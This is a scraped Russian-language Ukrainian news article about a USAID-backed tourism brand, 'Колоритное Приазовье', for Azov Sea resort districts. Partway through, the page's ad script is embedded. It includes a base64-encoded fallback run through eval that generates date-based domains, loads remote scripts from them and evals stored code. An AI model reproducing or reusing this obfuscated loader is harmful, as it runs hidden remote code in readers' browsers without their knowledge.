С помощью нового туристического бренда Кирилловку и другие курорты Приазовья хотят сделать популярными даже за границей.
Для Приазовья был разработан единый туристический бренд со слоганом «Колоритное Приазовье».
Об этом сообщает Восточный вариант со ссылкой на Проект USAID.
При содействии Проекта USAID «Экономическая поддержка Восточной Украины» (Проект USAID) «Zruchno Travel» и «Bulanov büro» разработали для Приазовья единый туристический бренд.
В Запорожской области исчезает популярное место отдыха на берегу моря (ФОТО)
Cлоганом региона выбрали фразу «Колоритное Приазовье». Под этим брендом будут продвигать четыре района — Бердянский и Мелитопольский (Запорожская область), Генический (Херсонская область) и Мариупольский (Донецкая область), а также вторичные дестинации — Белозерский и Каховский районы (Херсонская область). var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
«Туристический бренд Азовского региона является прекрасным инструментом позиционирования и продвижения туристической дестинации, — рассказывает руководитель сектора туризма проект USAID Александр Файнин. — Логотипы и слоган, который избран подавляющим большинством голосов экспертов туристической сферы Приазовья, можно использовать для брендирования сувенирной продукции, маркировка туристических маршрутов, на интернет-ресурсах, в транспорте. Имеем целью увеличить узнаваемость бренда «Приазовье» не только в пределах Украины, но и за рубежом, поэтому предлагаем представителям местного бизнеса и власти чаще использовать логотип и слоган».
Вскоре состоятся презентации туристического бренда на национальном и областном уровнях.
В этом году при содействии Проекта USAID планируется также создание туристического портала Приазовья и серии видеоблогов о туризме региона. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/nashli-sposob-sdelat-populyarnoj-kirillovku-dazhe-za-granitsej/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook